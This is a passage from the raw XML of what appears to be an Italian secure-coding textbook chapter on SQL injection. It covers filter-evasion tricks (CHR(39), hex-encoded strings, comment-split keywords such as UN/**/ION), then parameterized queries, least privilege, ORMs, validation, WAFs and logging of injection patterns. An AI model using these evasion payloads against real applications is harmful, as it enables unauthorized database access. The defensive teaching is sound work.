        <w:t xml:space="preserve">(in MySQL) o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CHR(39)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(in PostgreSQL) generano un apice senza usarlo letteralmente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1097"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Stringhe con prefissi alternativi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x61646D696E</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(esadecimale) è una rappresentazione binaria di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in MySQL, accettata dove ti serve una stringa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1097"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Commenti per spezzare keyword</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UN/**/ION SE/**/LECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">aggira filtri che cercano la parola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">UNION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">intera</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="231"/>
    <w:bookmarkStart w:id="232" w:name="la-lezione"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La lezione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La SQL Injection è una vulnerabilità</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">strutturale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: nasce dalla mescolanza di struttura e dati. Tentativi di difenderla per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">sintomo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(filtra questo carattere, blocca quella parola, controlla se l’input</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sembra sospetto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) sono una rincorsa infinita che l’attaccante vince sempre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">La difesa è strutturale: separare struttura e dati con i parametri.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Punto. Niente filtri custom. Niente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">deny list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di parole proibite. Niente regex per trovare gli apici. Solo query parametrizzate, sempre, ovunque.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="232"/>
    <w:bookmarkEnd w:id="233"/>
    <w:bookmarkStart w:id="239" w:name="difese-aggiuntive-in-profondità"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="505" w:name="sec_5_10"/>
      <w:r>
        <w:t xml:space="preserve">5.10 Difese aggiuntive in profondità</w:t>
      </w:r>
      <w:bookmarkEnd w:id="505"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le query parametrizzate eliminano la SQL Injection alla radice. Ma il principio della</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">difesa in profondità</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">) ci insegna a non fidarci mai di un singolo controllo. Ecco le difese aggiuntive che vanno applicate in produzione, sopra alle parametriche.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="234" w:name="X957f123736bf081b34b493a5f990e53f1bacfda"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Privilegi minimi del database (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Least Privilege</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’utente del database con cui la tua applicazione si connette</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non deve essere</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Deve avere solo i permessi che servono effettivamente: per esempio, SELECT/INSERT/UPDATE su alcune tabelle, e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">niente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sulle altre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se domani un nuovo bug introduce una SQL Injection nel tuo codice (succede), un utente DB con privilegi minimi limita drasticamente il danno: l’attaccante non potrà cancellare tabelle, accedere a tabelle di sistema, modificare la struttura.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In SQLite questo è meno pertinente (è un DB single-user); ma in PostgreSQL/MySQL/SQL Server è una regola fondamentale.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="234"/>
    <w:bookmarkStart w:id="235" w:name="uso-di-un-orm-object-relational-mapper"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Uso di un ORM (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Object-Relational Mapper</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ORM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è una libreria che mappa le righe del database a oggetti del linguaggio di programmazione. Il vantaggio per la sicurezza: con un ORM non scrivi quasi mai SQL a mano, e l’ORM si occupa di parametrizzare tutto correttamente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per Python, l’ORM più diffuso è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SQLAlchemy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(esiste anche</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Django ORM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, integrato in Django). Esempio:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Con SQLAlchemy ORM</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">utente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> session.query(Utente).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    Utente.username </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> username,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    Utente.password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> password</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">).first()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Niente SQL scritto a mano: SQLAlchemy lo costruisce automaticamente con parametri sicuri.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attenzione però: gli ORM offrono spesso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">scappatoie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per scrivere SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">raw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">quando serve. Se lo fai, devi rispettare le regole delle parametriche anche lì. Un ORM non protegge magicamente: protegge se lo usi nel modo standard.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="235"/>
    <w:bookmarkStart w:id="236" w:name="X6fdbeb0169e9cc1ab879c96e5680f5950922c79"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Validazione dell’input (in supporto, non in sostituzione)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le parametriche eliminano la SQL Injection. Ma è comunque una buona pratica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">validare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che l’input rispetti il formato atteso, prima ancora di toccare il database:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1098"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se ti aspetti un numero,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">converti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">try/except</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Se non è convertibile, rifiuta la richiesta con un 400 Bad Request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1098"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se ti aspetti una email, valida il formato con una libreria (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">email-validator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1098"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se ti aspetti un username, accetta solo lettere/numeri/underscore con una whitelist (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">re.fullmatch(r"[a-zA-Z0-9_]+", username)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La validazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non sostituisce</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">le parametriche — sono due livelli che lavorano insieme.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="236"/>
    <w:bookmarkStart w:id="237" w:name="web-application-firewall-waf"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Web Application Firewall (WAF)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">WAF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è un componente di rete che si frappone fra internet e la tua applicazione, ispezionando il traffico HTTP per cercare pattern di attacco noti (incluse SQL Injection). Esempi: ModSecurity (open source), Cloudflare WAF, AWS WAF.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I WAF aiutano, ma:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Sono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">l’ultima linea di difesa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, non la prima.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Si aggirano: ogni mese escono articoli su come bypassare specifici WAF.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Generano falsi positivi: bloccano richieste legittime che assomigliano ad attacchi.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Costano (in soldi e in latenza).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un WAF è un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">complemento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">alla sicurezza del codice, mai un sostituto.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="237"/>
    <w:bookmarkStart w:id="238" w:name="logging-e-allarmi"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Logging e allarmi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le query SQL anomale, gli errori di sintassi del database, i parametri con caratteri tipici di SQLi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UNION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OR 1=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">…) vanno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">registrati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in un sistema di log centralizzato. Idealmente, un sistema SIEM (Wazuh, Splunk) genera un allarme se la frequenza supera una soglia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questo non previene l’attacco, ma ne</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">riduce il tempo di rilevazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: invece di scoprire il breach mesi dopo (vedi A09 OWASP del </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_4" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), te ne accorgi in minuti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="238"/>
    <w:bookmarkEnd w:id="239"/>
    <w:bookmarkStart w:id="240" w:name="errori-comuni-che-vedrai-in-produzione"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="506" w:name="sec_5_11"/>
      <w:r>
        <w:t xml:space="preserve">5.11 Errori comuni che vedrai in produzione</w:t>
      </w:r>
      <w:bookmarkEnd w:id="506"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una rassegna onesta degli errori più frequenti che troverai nel codice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vero</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">durante stage e lavoro.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t xml:space="preserve">Concatenazione f-string in</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">execute()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SQLi totale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Usare</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">?</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">e tupla parametri</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Operatore</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">%</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">di Python invece dei placeholder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SQLi totale (sembra parametrico ma non lo è)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Passare i parametri come secondo argomento</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Parametri usati ovunque tranne nei nomi colonna/tabella</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SQLi indiretta nelle parti dinamiche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Whitelist hard-coded di nomi tabelle/colonne accettati</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
